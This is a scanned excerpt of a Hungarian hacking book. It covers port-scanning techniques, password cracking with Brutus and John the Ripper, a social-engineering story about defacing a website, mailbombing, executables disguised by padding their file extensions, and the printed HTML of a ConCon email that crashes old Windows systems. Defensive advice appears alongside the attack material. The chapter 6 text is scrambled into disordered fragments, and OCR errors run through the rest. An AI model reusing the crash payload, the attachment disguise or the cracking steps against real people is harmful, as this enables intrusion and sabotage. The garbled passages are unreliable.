1. akkor SYN-ACK.A rések keresése 6. különben nehezen érthetők az összefüggések. illetve a kliens megpróbál teljes kapcsolatot felépíteni a host minden portjához.6 Szkennelés . Az mindenesetre biztos. hogy a rendszergazdák ellenőrizzék rendszerük biztonságát. hogy minden időkeretet túllépne. A rendszer minden jogosultságával rendelkező rendszergazda teljes áttekintést szeretne kapni. többek között arról. A szkenner egy TCP/IP csomagot küld SYN-flaggel a számítógépnek (a flagek [zászlók] speciális ismertetőjelek a csomag TCP-headerében). hanem a SYN-ACK megerősítés után egy elérhető sockettől RST-ACK-val rögtön megszakítják a kapcsolatot. és nagy valószínűséggel a támadó IP-címe is beíródna a rendszer logfájljaiba. ha nem érhető el a port. de időközben már Windowshoz is kifejlesztették.2. Emellett a portszkennelés arra is szolgál. a hacker pedig észrevétlen szeretne maradni. 6. hogy milyen szolgáltatások futnak a rendszeren. hogy egy rendszer minél több csatolófelületét. akkor az elérhetőnek számít. amelynél egyidejűleg nagyon sok kérdést tud feltenni. hiszen e szó jelentés itt az. Ezen a módon persze nagyon sokáig tartana minden kapcsolatot felépíteni és azután befejezni. Ehhez minden fontos információ megtalálható a 3.2. Ehhez a következőképpen járnak el: a szkenner. Ebben az esetben a szkenner ismét ACK-val válaszol.2 Szkennelési eljárások Egy rendszer szkennelésére különböző lehetőségek kínálkoznak. és visszadják a rendszer válaszait. A legismertebb szkennerek közé tartozik a Nessus és az nmap .mindkettő a Linux alatt gyökerezik. Minden hacker elvégzi a portszkennelést a célrendszerén. A szkennerek kérdéseket küldenek a portoknak. amelyek mellett a feladatot meg kell oldani. ha elérhető. mielőtt munkához látna. hogy minden portot le lehet-e szkennelni. és a kapcsolat létrejött. az azoktól a feltételektől függ.2 Félig nyitott TCP-szkennelés A félig nyitott szkennelésnél nem állítanak elő teljes kapcsolatot a hosthoz. melyek engedik meg kapcsolat felépítését. hogy kitalálják. illetve portját szólítják meg. Ha a szkennelt számítógép biztonsági és felügyeleti státusza csekély. 6. a host visszajelzése pedig. fejezetben. lehetségesek-e anonim loginek. A következő magyarázatok feltételezik a közkedvelt protokollok alapismereteit. A portszkennek a támadók legfontosabb eszközei. Éppen ezért a szkenner multi-socket eljárást alkalmaz.1 Szkennelés teljes TCP-kapcsolattal Itt egy olyan szkennelési eljárásról van szó. mert nagyon feltűnő. hogy nagyon gyorsan vezet eredményre. hogy Unix alatt csak az tud végrehajtani ilyen eljárást. lehetőleg gyorsan. RST-ACK. 6. Hogy ezek közül melyiket választják. akinek root-jogai . és hogy megkövetelik-e a hitelesítést a hálózati szolgáltatások. amelynek a célja TCP alapú szervizeket/szolgáltatásokat találni. A szkenner A szkenneléshez szükség van egy portszkennerre. Ezért minden rendszergazdának jól kell ismernie a szkennereket. No persze nem a hagyományos értelemben vett szkennelésről van szó. A szkennelés az egyik legfontosabb módszer egy rendszer gyenge pontjainak a felismerésére. Ha a szkenner ezeknél a kísérleteknél egy porttól feleletet kap. Az előnye viszont. Közben különböző információkat gyűjtenek. és kérdéses lenne. A támadóknak azonban nem felel meg. akkor nem fogják észrevenni ezt a szkennelést. Ennek az eljárásnak az előnye.

2. hogy a fennálló kapcsolatot annak rendje és módja szerint bezárják. hogy a számítógép kiadjon egy választ. akik rootként vannak bejelentkezve. hogy a port nem elérhető. Ennél a TCP-csomagok több kis csomagra fragmentálódnak. Ha a számok valamelyike mögött van egy rendszer.2. Tehát szkenneljük a portokat. 6. hogy a hálózatokban az erre jogosult rendszeradminisztrátoron kívül senki se tudjon végrehajtani ilyen szkennelést alacsonyabb jogokkal. A lezárt portok RSTcsomaggal válaszolnak a FIN-csomagra. akik rootként vannak bejelentkezve. és azok a felhasználók. amely a számítógépen fut.2. és a pontossága nagy mértékben a szkennelt számítógép kihasználtságától.) futnak a rendszeren. A háttérben ismét egy bug áll: ha megpróbálunk egy portra írni. Ezen a módon lehet meggyőződni arról. HTTP.3 TCP-FIN-Scan A TCP-FIN szkennelést a Unix alatti TCP-implementációk többségének egy hibája (bug) teszi lehetővé. akkor többnyire ezt az üzenetet kapjuk: Error 13 . mielőtt még egy megtalált rendszeren el lehetne indítani a tulajdonképpeni portszkennelést. nem igazolja vissza a fogadást.Try Again.2.2. Ennél az eljárásnál tehát minden portot kétszer szkennelnek. amelynél csak azok a userek kapnak pozitív visszajelzést. Csak a lezárt port küld vissza egy üzenetet. hogy mégis kapjunk informatív visszajelzést . amelyen a támadó a legkülönbözőbb szkennelésekkel réseket kereshet.5 UDP-lCMP-Port-Unreachable szkennelés Az UDP. HTTPS. 6. Telnet. akkor egy portlista segítségével lehet áttekintést kapni arról. 6. Ez gondoskodik ugyanis arról. Ehhez egy ICMP-ECHOcsomagot vagy egyszerűen egy pinget küldenek kölönböző IP-címekre. hogy „érdekes" jelzéseket kapjon. hogy nem fogja-e egy tűzfal felfedezni a portszkennelést. és gyakran megbízhatatlan. Ez azt jelenti. A szkennelésnek ez a módja nagyon hosszadalmas. stb. A szkennelésnek ez a módja azok közé a csekély számú eljárások közé tartozik. amit sajnos.6 UDP-Recvfrom-And-Write szkennelés Ellentétben a UDP-ICMP-PORT-UNREACH szkenneléssel. Természetesen ez az eljárás is nagyon időigényes. Ezeket a szkenneléseket csak a rendszergazda tudja elvégezni.Connection refused üzenet helyett. megkapják az ICMP PORT UNREACH üzeneteket. a támadó utánanéz a megfelelő kihasználási lehetőségeknek. egyszer. nem látunk. amelyek nem feltűnőek. a normál Error 111 . a UDP-Recvfrom-And-Write szkennelés egy normál módon bejelentkezett felhasználónak is lehetővé teszi. A támadók most hozzákezdenének információkat gyűjteni a célrendszerről. Ráadásul csak Linux alatt működik. 6. és várunk egy UDP-ICMP-PORT-UNREACH üzenetre. hogy egy ICMP echo scanning/ping szkennelést hajtanak végre.7 ICMP-echo-scanning/ping-szkennelés A szkennelésnek ez a módja csak azt állapítja meg. . más protokollokkal ellentétben.2. Ezek a „letapogatások" azonban csak Unix alatt működnek. hogy találjanak egy hostot. hogy milyen szervizek (FTP. A FIN-csomagokat arra használják. a nyitottak ezt nem teszik. az ICMP-ECHO-REPLY csomaggal válaszol. ezért lehet a TCP-FIN szkennel könnyen kideríteni a nyitott portokat.4 Fragmentált szkennelés A fragmentált szkennelés a TCP-szkennelések egy további módja. Ez az operációs rendszernél kezdődik. amelyik a UDP-ICMP-PORT-UNREACH szkennelésre ICMP-PORT-UNREACH választ adott (amiről normál felhasználóként nem értesülünk). 6.13-as hibánál a port le van zárva. A szkennelendő portra egy TCP-csomagot küldenek egy FIN-csomaggal. 6. illetve rendszererőforrásaitól függ.vannak. és másodszor. hiszen system admin jogok kellenek hozzá. Megvan tehát a cél. hogy milyen portok nyitottak és milyen operációs rendszer van telepítve. illetve darabolódnak. a Microsoft operációs rendszereknél a TCP-implementációnak nincs ilyen fajta hibája.8 A nyitott portok csak a kezdetet jelentik Ha találtatott egy rendszer nyitott portokkal. Aszerint. hogy melyik hostok elérhetők.

port elérhetőségét (lásd. Ezen keresztül számos fontos információt begyűjthetnek. . hogy megtalálják és analizálják a célrendszerüket. ha valaki például egy FTP-szervert működtet a rendszerén. Ez azonban többnyire nehezen kivitelezhető. vagy egy csatlakoztatott hálózat miatt biztosítania kell a 139. már akkor is. és megpróbálkoznak egy portra kapcsolódni. amelyet a betörők végrehajtanak. inaktívan kellene tartani.2. mint amilyen a Norton Internet Security. amint TCP-kapcsolatok érkeznek be. hogy egy rendszert szkenneljen. hogy ne kínáljunk támadási felületet. mielőtt még hozzákezdene a tulajdonképpeni támadáshoz. vagy portscan detektorok. a Windows-megosztásokat a Windows-rendszerek gyenge pontjairól szóló fejezetben). ameddig lehetséges. Tehát minden szolgáltatást. hogy figyelmeztető üzenetet küldjenek.9 A portszkennelés elleni védelem A szkennelés többnyire az első lépés. A legjobb védelem. ha a szkennelés nem talál nyitott portokat. Naplóz a Norton Internet Security A tűzfalaknak olyan protokoll-funkcióik vannak. mint például a BlackICE. amelyek feljegyzik a portszkenneket. Itt a tűzfalak segítenek. amelyek nélkül a betörés lehetetlen volna. hogy azonosítani lehessen a lehetséges támadót. Természetesen nagyon nehéz valakit visszatartani attól. A tűzfalakat arra is be lehet állítani. Ezért fontos védekezni a portszkennelés ellen.6. illetve naplóztatni a szkenneléseket.

4 External mód 7.Tartalom 7.3 Hackelt security-site .3.4.4.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők 7.4.3 Incremental mód 7.4.4.2 Beállítások áttekintése 7.1 7.4.2 7.5 A John legfontosabb parancsai 7.4 Jelszavak megfejtése a John the Ripperrel 7.6 A jelszófájl Single Mode .2 A szólista módszer 7.3.1 7. fejezet .7.1 Ismert felhasználói nevek jetszavainak a kitalálása 7.

Tehát ne hagyjuk.. amivel ilyenkor eljárnak. és máris büszke tulajdonosa lett egy GMX-accountnak.haennle@gmx. A hacker most a webtárhely szolgáltatójától kapott mail-eket kereste. ahol a valódi tulajdonos a nevétől kezdve a telefonszámáig tulajdonképpen minden adatot hátrahagyott. a „biztos jelszó" sem fog kimaradni. A hackereknek változatlanul az okos jelszavas védelem jelenti az egyik legnagyobb akadályt. Az egyik legfontosabb a Social Engineering.de) szolgáltatónál szerepelt kontaktcímként. A másik lehetőség: a jó szerencsében bízva egyszerűen megpróbálkozni néhány jelszóval. Ez történhet mondjuk egy telefonhívással. Tehát a hackernek más eszközökhöz kellett folyamodnia. Hogy hogyan is működnek ezek a programok. így két lehetőség adódott . hamar rájött.puretec. Itt a következő történt. amelyen semmiféle scripthibát vagy szerverhibát nem lehetett találni. amelyben a főnökünk keresztnevét kérdezik .denic.kulcsszó: email-cím.flieger@dmx.az első: várni pár napot egy mail-re a szolgáltatótól. hogy milyen névről van szó. hogy a webmesternek két GMX-fiókja van: tobias. amelyet egy m \ r3nda nevű hacker kinézett magának. Hogy ezek után mit csinált az oldalból? íme az eredmény: Ez a fejezet a jelszavak biztonságosságát tárgyalja. amely egy lista segítségével minden lehetséges variációt megjátszik.haennle@gmx. A kreativitás. egy ismert biztonsági és trójai információs oldal. Tehát fogta Tobias-t. A jelszófeltörésről oldalakat lehetne írni. hogy a kérdés mindkét postafióknál így hangzott: Mi a keresztnevem? Az oldalon megadott kontaktcímből. A jelszavak kiderítésére. Ezért itt csak a valóban fontos információkat szeretnénk bemutatni.de) és a Puretec (www. Természetesen a jelszófeltörők elleni legjobb védelem. amelyet a GMX-adatokból megtudott. A legfontosabb azonban az. A klasszikus jelszótörő egy olyan program. A támadó először megnézte a GMX-titkos kérdést. Kutatás közben megállapítot- Itt egy honlap volt . illetve feltörésére különböző lehetőségek vannak.thsecurity. hihetetlen. hogy a Pureteckel „elfelejtett" jelszavakat lehessen a kontaktcímre küldetni. a www. hogy egy jelszó ne legyen túl egyszerű. Most egy kicsit körülnézett a GMX felhasználói menüben. és látta.7 Jelszófeltörés ta. és a jelszóválasztás biztonságát a középpontba állítani. És nézzenek oda: ez megint telitalálatnak bizonyult.1 Hackelt security-site jelszófeltöréssel ez is lehetséges Egy ismert példa a th-security „átváltozása" (deface) volt.de. mert a Puretec általában havonta egyszer mail-ben elküldi a számlainformációkat.de és pegasuss.3 pontjából derül ki. 7. megváltoztatta a jelszót. amire szüksége volt ahhoz. mivel az interneten és a helyi számítógépeken is gyakran védik jelszavakkal a fájlokat a jogosulatlan hozzáférések ellen. Az első címet kontaktcímként adta meg a weboldalon. De ez biztosan feltűnne a felhasználónak. De nem voltak mail-ek a szolgáltatótól. Az áldozat. az a fejezet 7. a második a Denic-nél (www. A hacker a felhasználó születési dátumával kezdett. tehát tobias. mert ezekben szerepelt az ügyfélszám. és megváltoztatná a kontaktcímét.de volt.de (a címeket az adatvédelem miatt megváltoztattuk). amellyel a fontos adatok jelszó-tulajdonosoktól való megszerzését jelölik. hogy ismeretlenek olyan információkat csaljanak ki tőlünk. mert a legtöbb felhasználó nagyon lazán veszi a jelszó kiválasztását. amelyekre a Social Enineeringhez szükség van. amelyeket senkinek sem adnánk meg önként.

Ezután ki lehet választani a támadás fajtáját. A Brutus jelszófeltörő internetaccountok valamennyi variánsához (FTP. a Brute Force-ot használják. amíg megtalálják az igazit. • semmi duplázás. hogy hogyan válik lehetségessé egy „deface" a rosszul megválasztott titkos kérdés. . A jelszavak megadásánál a következő alapszabályokat kellene betartani: • ne legyen öt karakternél rövidebb. és szükség szerint szólistákat is be leA Brutus program: minden beállítás egy lapon Teljesen értelmetlen a jelszóhasználat. mint nagyon nagy sebességgel próbálják ki az egyik lehetséges jelszót a másik után.). • egy cetlit teszünk a billentyűzet alá vagy a monitorra. E programok nem tesznek mást. POP3. A Target mezőbe be kell írni a kikémlelendő fél URL-jét vagy IP-címét.2 Mire kell ügyelni a felhasználói oldalról? A legtöbb felhasználó nem túl ötletes egy értelmes jelszó kitalálásánál. amelyek jelszavakat fednek fel.és nagybetűkből állnak. kml34Hs9. Egy példa az ilyesfajta programra a Brutus.3 A jelszófeltörők A jelszófeltörők olyan programok.Ez bizony egy nagyon jó példa arra. ha • mindenütt ugyanazt a jelszót használjuk. 7. ehelyett egy névről nagyon jól ismert eljárást. HTTP. ha elfelejtette. hogy a felhasználónak lehetővé tegyék. pl. Ezzel a fogással meghiúsíthatjuk a korábban kikémlelt jelszó felhasználását. Telnet. • vegyesen kis. A Brute Force annyit jelent: nyers erőszak. NetBios stb. Ezért a rosszul választott jelszavak kihasználása a hackerek egyik legjobban elterjedt támadófegyvere. amelyek benne lehetnek a jelszólistákban vagy a szótárakban. az alkalmatlan jelszó révén. • semmi születési dátum és hasonlók. A jelszót a legritkább esetben fejtik vissza. 7. Az internetjelszavak minden fajtájához szívesen használják. • ne legyen szabványos. mert így minden támadónak lehetővé tesszük a jelszavunk tetszés szerinti megváltozatását. megváltoztatni a jelszavát. és ráírjuk a jelszót. • ne legyenek olyan szavak. tehát ne legyen „hhaalloo". • a jelszó egy fájlban van mentve a gépen. A jelszót kettő-négy hetente cserélni kell. • alfanumerikus karaktersorból. hogy ki kerüljék az alkalmazott biztonsági intézkedéseket. A titkos kérdések legyenek titkosak Az interneten a különböző oldalak biztonságra ügyelő szolgáltatói jelszókérdések vagy titkos kérdések megadását kínálják. A jó jelszavak • több mint tíz karakterből. Gyakran lehet ilyen kérdésekkel találkozni: „Mi a hideg ellentéte?" Ez természetesen rossz választás.

hogy vissza lehessen követni a támadót.3. HTTP. Connection: meg lehet adni. hogy mennyi idő múlva szakítsa meg a program a kapcsolatot. amely úgy működik. Method: HEAD KeepAlive: megjelölve.net. 7. mert mindkettőnél ugyanazt a kódolási eljárást (DES) alkalmazták. FTP.txt. Így lenne ez például akkor is. mert az már ismert. Ha a jelszavak kódolt állapotban egyeznek.4 Jelszavak megfejtése a John the Ripperrel A John the Ripper egy jelszófeltörő. amelyre John the Rippernek szüksége van a jelszavak visszafejtéséhez. external). amelyek. a . amely megakadályozza. ha a jelszó a listán van. hogyan történjen a feltörés. incremental. Type: itt lehet kiválasztani a cél típusát. Az idő. Timeout: megadható.2 Beállítások áttekintésére Target: a host URL-je vagy IP-je. Pass Mode: szólista. akkor visszafejtve is egyezniük kell. Lehet szólistával. ezért a program egyes verziói különböző processzorokra optimalizáltak.4. POP3. Single User: kiválasztva User ID: usernév (pl. pl: lol@gmx.het tölteni. jelszóként felhasználni. SMB (NetBOIS) stb. A John the Ripper szerény felhasználói felülete 7. Pass Fik: words.3. igencsak megrövidítik a feltörést. Még ha a passwd fájlban az adatok „árnyékolva" is vannak (ez a bizonyos shadowing az újabb Linux/Unix verziók biztonsági intézkedése. a POP3 vagy FTP-account van. hogy milyen módban indult el (single.. HTTP esetén a 80-as port. hogy a jelszavakat eltávolítja a passwd fájlból. hogy a megadott jelszólehetőségeket például DES-sel kódolja. amelyet előre meg lehet adni. Fercsi stb. A DES-kódolások felhasználásának egyik területét a Unix-jelszavak jelentik. telefonszám stb. 7. itt lehet kiválasztani. és helyette a shadow-fájlban tárolja). Port: a port megadása. Itt lehet egy névlistát választani különböző user nevekből. amelyet a Brutus mellé adnak. azaz a userek személyes adatait. ha elfelejtettük a fiók-jelszavunkat. amely DES-sel (Data Encryption Standard) kódolt jelszavakat tud dekódolni.1 Ismert felhasználói nevek jelszavainak a kitalálása Mint már a neve is mutatja. a rendelkezésre álló processzor sebességétől függ.1 Single Mode Ebben a módban a John megpróbálja a jelszófájlban tárolt GECOSinformációkat (General Electric Comprehensive Operating System). de nincs meg a hozzá tartozó jelszó. a Brutus itt lehetővé teszi egy proxy bejegyzését. Use Proxy: nincs kiválasztva. a program ennél az eljárásnál csak egy user névvel próbálkozik. Telnet. például név. 7. a támadásokhoz hasznos tulajdonság egy beépített proxy. és az eredményt összehasonlítja a megfejtendő jelszóval. Itt lehet egy szólistát betölteni. amelyen pl. Use Username: kiválasztva. Jóska. Egy további. combo-listával vagy Brute Force-szal. FTP-nél a 21-es. szólista. amelyeket a Brutus mellékel. hogy milyen gyakran létesítsen kapcsolatot a program.). A John működése azon alapul. aszerint.

vissza tud fejteni úgy. A John the Ripper legfontosabb parancsainak az áttekintése John -single John -i John -w:aszólistaneve John -e:MODE 7. majd szólista. 7. mert a John egy kicsikét gyorsabban dolgozik. a jelszó hosszától és a jelszóban használt karakterektől függően) nagyon hosszú is lehet. Ez a parancs external módban indítja a Johnt.ill.4. A szólistát úgy kell felépíteni. Minden létező jelszót.3 Incremental mód Ez a John leghatalmasabb üzemmódja. EXTERNAL: előtt definiált MODE tulajdonságokkal. 7. A jelszavak „árnyékolva" sem lehetnek. és ezzel a siker valószínűségét növelni. hogy összevezeti a passwd fájlt és a shadow fájlt.2 A szólista módszer Ennek a módszernek a hatékonysága teljes mértékben a felhasznált szólista méretétől és főleg a minőségétől függ. ha a felhasználók személyes információikat használják jelszóként. Azt mindenesetre figyelembe kell venni. a USERNAME: PASSWORD séma szerint kell tárolni. hogy egy sorban mindig csak egy USERNAME:PASSWORD pár legyen. hogy betűkből. mégpedig úgy. Ezt az eljárást Brute Force-nak is nevezik. Ennek a módnak a hatékonysága a jelszófájl tartalmazta felhasználók számával növekszik. A john parancs kilistáz minden lehetséges paramétert. mert minden rendkelkezésre álló információt fel lehet használni. hanem normál kódolt állapotban kell lenniük (pl: árnyékolva= john:x vagy john:* .GECOS-információk azonban még mindig a passwd fájlban vannak. Hogy hány ilyen pár van a fájlban tárolva. Ez a parancs szólista módban indítja a Johnt. amelyek a szólisták kezelésében segítenek. mert teljes mértékben konfigurálni kell. így lehet szerver. különleges karakterekből. végül incremental módban futtatja le a Johnt.4 External mód Ez a mód inkább tapasztalt felhasználóknak való. Minden parancs után meg kell még adni a jelszófájlt is. Erre a parancsra mutatja meg a program a megfejtett jelszavakat. mert minden felhasználó GECOS-információját az összes többinél is kipróbálja jelszóként. hogy a szólista ábécé-sorrendben legyen. vagy eltávolítják a dupla bejegyzéseket). Ez a mód természetesen csak akkor hatékony.4. ha az egymás után következő szavak vagy karaktersorozatok nem különböznek túlzottan egymástól (vannak programok. ezért a jelszavakat és a GECOS-információkat megint csak egyetlen fájl tartalmazza. számokból vagy kombinációkból áll. Ebben az esetben az Unshadow program segít. ábécé-sorrendbe rendezik.4. ezért nem szabad alábecsülni.5 A John legfontosabb parancsai Parancs Leírás Ez a parancs single módban indítja a Johnt. Arra is ügyelni kell. 7. függetlenül attól. hogy egy ausztráliai szerver passwd fájlja német jelszavakat tartalmaz. hogy minden lehetséges kombinációt ellenőriz. hogy minden sorban csak egyetlen karakterfüzér legyen. hogy a szükséges idő (a processzor teljesítményétől. akkor a GECOS-információknak és a user-könyvtár elérési útvonalának is mögötte kell állnia ( p l : john:OozDCtCCAa/lM:11202:0:99999:7:0:). Ezeket kettősponttal elválasztva. a szólista német részét ebben az esetben el lehet hagyni.4. Ha a single módot kell használni. 7. az nem túl lényeges.4. kódolva=john:GjstuOeYjOEhc). És éppen ez adja ennek az eljárásnak a erősségét: mivel valószínűtlen. például több listát összefűznek. Ez a módszer egyben nagyon gyors is. . Ez a parancs incremental módban indítja a Johnt.6 A jelszófájl Ennek a fájlnak tartalmaznia kell a megfejtendő jelszavakat a hozzájuk tartozó felhasználó-nevekkel. a LIST. csak arra kell figyelni. adminspecifikus szólistákat előállítani. John fájlnév John -show Ez a parancs először single.

praktikus és veszélyes 8.1 Mailbombák .1.2 Milyen biztonsági rések vannak? .8.2.Tartalom 8.1 Az ICQ .2 A fájlmelléklet kitömése 8.túlcsordul a postafiók 8.1.1.3 AConConbug 8.2 ICQ .biztonsági kockázat? 8. fejezet .2.1 E-mail-támadások 8.

Képzeljük csak el egy online bolt üzemeltetőjének a helyzetét.és drága . E-mail-bombázó Arzytól szánthatják. S bizony roppant időrabló ténykedés eltávolítani a többnyire különösebb tartalom nélküli mail-ek százait.1 Mailbombák . 8. vagy .1 E-mail-támadások Az e-mailek a legfontosabb kommunikációs bázist jelentik az interneten. 8. amelyek sok felhasználóban nem is tudatosulnak. hogy a mailbomba-támadások mögött mennyire van stratégia. Ezek az adatátviteli protokollok az ASCII karakterkészletre korlátozzák a tartalmukat. az a mailbombázók által gyakran használt SMTP és Telnet internetprotokollok (lásd az Alapok fejezetet) felépítésén múlik.1. aki nem kapja meg a megrendelés-maileket. a szerver vissza fogja utasítani. Ezt ugyanis. Ebben a tényben azonban veszélyek is rejlenek. Itt elsősorban az e-mailek és az ICQ biztonsági kockázatairól lesz szó. Ugyanis elég időigényes . Kiderül. Egy ilyen támadás azonban akár pénzügyileg is érinthet kisebb cégeket. Ez a fejezet az internet-használat veszélyeinek és kockázatainak reálisabb felbecsülésében próbál segíteni. A különböző trójai.túlcsordul a postafiók A mailbombák nem jelentenek közveden veszélyt az internet-használók adataira vagy saját számítógéprendszereikre. Ennek alapján nem nyújtanak lehetőséget arra. amelyeknek fontos kommunikációs eszközt jelent az internet. és a tartalmak is mind vonzóbbakká válnak. hogy szinte egyidejűleg hallatlanul nagy számú mail-t tudnak küldeni a kívánt címre. amelyeknek a saját PC-nk vagy akár a hálózat is ki van téve. hogy a címzett postafiókja hamar túllépi a maximális kapacitását. hogyan és milyen változatokban hajtanak végre támadásokat felhasználók ellen. A legtöbbek életéből már nem maradhat ki ez a médium. sőt még arra is van mód. hanem abban is.választás szerint hamis feladócímet is meg tudnak adni.8 Támadások az internet-felhasználók ellen Az internetet használók száma folyamatosan növekszik. ezeket az adott témának szentelt fejezetek tárgyalják. ezt pedig a hackerek kihasználják a rendszerek megtámadásához. Nehéz felmérni. A támadó anonim marad Hogy a mailbomba-támadások áldozatai nem tudnak közvetlenül a tettesekre támadni. Az interneteléréssel azonban növekednek azok a veszélyek. mert mailbomba-támadás áldozata lett. hogy valaki hamis feladócímet adjon meg! A mailbombázók sajátos képességei tehát nemcsak abban nyilvánulnak meg. ha tudják. egyre újabb és újabb szolgáltatásokat kínálnak a számukra. tehát csak egyszerű szöveget szállítanak.lehet. hogy a feladó adatait ellenőrizni lehessen. és nem tud több mail-t fogadni. inkább csak idegölők és zavarók. A mailbombázáshoz a támadók számos programból választhatnak. Egy egyedi felhasználónak főleg az idejét rabolhatják a bombázással. ha az embernek hirtelen 5000 nem kívánt mail-t kell törölni a postafiókjából. Ennek természetesen az a következménye. hogy anonimek maradnak. akkor bosz- .és víruslehetőségekről itt már nem beszélünk. mivel a mailbox a támadás miatt túltelítődik. hogy egy fontos mail-re vár.

így működnek a mailbombák Ahhoz. és a munkát felosszák több különböző szerver között. hogy először mentsük merevlemezre és ellenőriztessük vírusvizsgálóval az ismeretlen forrásból származó mail-ek csatolt fájljait. felhasználói biztosan jól ismerik az előbb említett mailreklámot.com/ címen egy Outlook-frissítést is kínál. *. a merevlemezre mentve.doc exe A hosszúsága miatt (amit az üres karakterek okoznak) az Outlook csak a Profil. Természetesen ebben az esetben azonnal elindul a megfelelő program. Ezen kívül a Microsoft a http://windowsupdate.egy mail kipufferolt fájlmelléklete . így a felhasználó feltételezheti. mint a Sub7 (lásd a trójaiakról szóló fejezetet). A csatolt fájlok elleni védelem A fent bemutatott fájlmellékletet nyilvánvalóan nem a Word dokumentum ikonja jelöli. *. Ezt egyébként azért teszik. 8.microsoft.doc-ot mutatja. A csatolt fájl. s a további mail-akciókat zárolni lehetne erről a szerverről! Az utóbbi időben egyre több mailbomba-támadás összpontosít cégekre. hogy álcázzák a csatolt fájlt. Ráadásul egy ilyen tranzakció egyeden szerveren keresztül talán túl feltűnő lenne.2 A fájlmelléklet kitömése Vírusok és trójaik küldésénél a hackerek állandóan szembesülnek azzal a problémával. hogy az elképesztő tömegű mail egyáltalán továbbítódjon a felhasználóhoz. hogy az *. Ezáltal az egyes mail-szerverek túlterhelésének a kockázata is csökken. megkérdőjelezhető fájlcsatolásoknál Mailbomba-védelem A német online szolgáltatók. anélkül.EXE. Figyelmeztető üzenet az Outlooktól. Általánosságban érvényes. amelyek. A szervezett mailbomba-akciók ezeknek a cégeknek a mail-postafiókjaira gyakran sikeresnek bizonyultak! Ezért a legtöbb mailszolgáltató ügyfél-postafiókjain ki lehet választani az antí-spam opciót. hogy felgyorsítsák az akár 10 ezer mail továbbítását. hogy előzőleg a merevlemezre kellene menteni. mint az AOL vagy a GMX. az akaratuk ellenére. a mailbombázó programoknak több szerverrendszert is meg kell adni. és feltelepül az esetleg hozzáfűzött vírus vagy trójai.1. amelyek agresszív reklámjaikkal tűnnek fel az interneten. postásként fognak működni. amit közvetlenül is meg lehet nyitni az Outlookból. Ezért gyakran egy trükkhöz folyamodnak. még Word-ikont is tud varázsolni. hogy a címzetteknek továbbítsák a mail-eket. hogy csak egy hagyományos Word-dokumentumról van szó. Ez megakadályozza. az úgynevezett spam-et. amely még a mail-hez csatolt fájlok futtatása előtt figyelmeztetést küld a gyanús fájloknál. a következőképpen néz ki: Profil. Ártatlannak tűnik . A felhasználó tehát figyeljen a megfelelő ikonra! Persze az elszánt hacker az olyan programokkal.BAT nevű mail-mellékletek veszélyesek lehetnek.COM. hogy a nyilvános ismeretterjesztés hatására sok felhasználó már tudja.

8.telekabel.</DIV> <CENTER><IMG align=3Dcenter alt=3D"Elfuthatsz. Ez veszélyes lehet a nem mentett adatok miatt.3110. DD. font-weight: regular. font-family: "Tempus Sans ITC". hogy újra kell installálni az operációs rendszert.3 AConCon bug A csatolt fájlok mellett a mail-éknek is lehet veszélyes tartalmuk." height=3D116=20 src=3Dcid:005001bfc591$8d8c9fOO$23b02fd5@lol. font-family: "Tempus Sans ITC". MENU. Egy példa erre a híres Windows ConCon bug. A ConCon „nagy kék halált" okoz. = LI { color: FF3300. "Arial". font-family: "Tempus Sans ITC". amely a foglalt eszköznevek meghívására vonatkozik. font-size: 24pt. "Arial".de=20 width=3D617></CENTER><BR><BR><BR> <CENTER> <Hl>Elfuthatsz. BR. hogy ennek a hibának a többszöri fellépése kárt okozhat a Windows kernelben. font-weight: regular. aminek az a következménye.charset=3Diso-8859-l = http-equiv=3DContent-Type><BASE=20 href=3Dftle://C: \Con \Con \> <STYLE> <'body. "Ariar. DT. font-weight: regular.gif> <P>Üzenetet ide beilleszteni. Az is ismert. amelyek például így nézhetnek ki: <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN"> <HTML> <HEAD> <META content=3Dtext/html.</P></CENTER></BODY></HTML> ConCon-mailnézet egy erre a búgra rezisztens Windows 2000rendszeren color: FF3300. és újra kell indítani a PC-t. OL.72. ADDRESS. A ConCon mail-ékben terjed beágyazott HTML-fájlokon keresztül.7"! name=3DGENERATOR> </HEAD> <BODYbgColor=3D#99ccffleftMargin=3D30topMargin=3D5> <DIV>&nbsp.=20 } hl { color: FF3300. "Comic Sans MS". } ? { </STYLE> <META content=3D'"MSHTML 4. font-size: 20pt. PRE. DIV.=20 } hl . Ez a Windows 95/98/98 SE Windows kernelének egy hibájára épül. "Comic Sans MS". DIR. P. BLOCKQUOTE. UL. "Comic Sans MS". de el nem menekülhetsz=20 előlem!<TOPMARGIN=3D1 50></H1Yó></CENTER><BR><CENTER> <IMG src= "\C: \Con \Con. font-size: 30pt.1.

3.microsoft. Az ICQ biztonsági kockázata azonban sokkal inkább annak a rendszernek a biztonságosságán múlik. amelyen a kliens fut. és kapcsolatba léphetünk vele. mint magán az ICQnetworkön. hogy kinek adnak engedélyt és kinek nem a kontaktlistájukhoz. Azok a támadások is kedveltek.asp?ReleaseID=193 89 címen a Microsofttól letölthető egy patch a bug kijavításához. 2. hogy ki van onlineban. vagy ki akarja. Így a rendszer nem tud elindulni. Tulajdonképpen a címünkhöz vagy az IP-nkhez hasonlítható. és a támadóknak szállítják a megfelelő információkat. akikkel rendszeresen szeretnénk kapcsolatot tartani. és a gép lefagy.1 Az ICQ . amelyeknél a támadó üzenetek sokaságával bombázza az áldozatot (lásd ebben a fejezetben. Az ICQ legnagyobb veszélye tulajdonképpen abban rejlik. .2 ICQ . miután nagyon kényelmes és felhasználóbarát. amikor bejelentkezik a kommunikációba. 8.Ezt a mailt elég kijelölni és belenézni. hogy „Van-e ICQ-d?" egyre gyakrabban kapjuk azt a választ. az Away és az Invisible. Ha egy másik felhasználót keresünk. sőt MacOS-hoz és BeOS-hoz is van ilyen.com/downloads/release. ofíline-ban. mert túl veszélyes". hogy „Nem. Windows ICQ Client v. A státuszon lehet látni. A felhasználóknak észnél kell lenniük. Az IP kiadása ugyan különböző beállításokkal megakadályozható (a 99b verziótól egy másikat is lehet megtévesztésként mutatni). 1. minden alkalommal elindul ez a fájl.biztonsági kockázat? Az utóbbi időben elszaporodtak azok a vélemények. Manapság már majdnem 150 millió szám létezik. Ezeket a hálóról származó eszközökkel lehet végrehajtani. az Offline. Ezek közül is egyértelműen az IP a legfontosabb. vagy egyszerűen a UIN. Ez a szám a Universal Identifier Number. Ráadásul az ICQ-t ért különböző remote-buffer-overflow-k és DoStámadások is ismertek. hogy a támadónak információkat 